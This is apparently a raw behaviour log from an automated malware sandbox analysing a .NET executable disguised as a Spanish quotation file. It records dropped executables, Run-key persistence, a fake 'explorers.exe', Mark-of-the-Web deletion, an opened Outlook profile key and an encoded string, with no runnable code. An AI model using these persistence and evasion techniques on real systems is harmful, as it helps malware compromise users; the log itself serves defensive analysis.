                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\explorers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\explorers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_01
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeString found in binary or memory: +Dvxycfl3T9MkWh8stOyk+D+MDJKE/Mh0NRoGs/1I+WA6+Jn8ey/jdqLo5I6Z5iEvnFLvaGBuHXQsE1PTq3WksuXNTK4El9KzHOQZOOIKQV9YEjGnwEj+cTtNPaA69y1HbCuacGCnEZHNlIxQ01F3uJTAUHlMaQnaiqRvD3VWDwp49Zq7COBl/aDdevUqcTWgZgrAYPEKdE/4pgWFWlReC3S2/VevanW/qSYIfDnpJQQGZ1C/pBoOg38fOP8j1J1bP0J
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic file information: File size 2820096 > 1048576
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2afa00
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Jnubtmqkgfxsxcozqzr.pdb source: InstallUtil.exe, 0000000D.00000002.531950659.0000026E32EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.531950659.0000026E32C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.537485771.0000026E3B1B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeCode function: 0_2_00007FFDC40079AE pushad ; retf
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeCode function: 0_2_00007FFDC40079DE push eax; retf
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeCode function: 0_2_00007FFDC400721E pushad ; iretd
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeCode function: 0_2_00007FFDC400724E push eax; iretd
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 13_2_00007FFDC3FF83A8 push ebp; ret
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeJump to dropped file
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile created: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeJump to dropped file
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile created: C:\Users\user\AppData\Local\explorers.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run explorersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KbWSeJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile opened: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
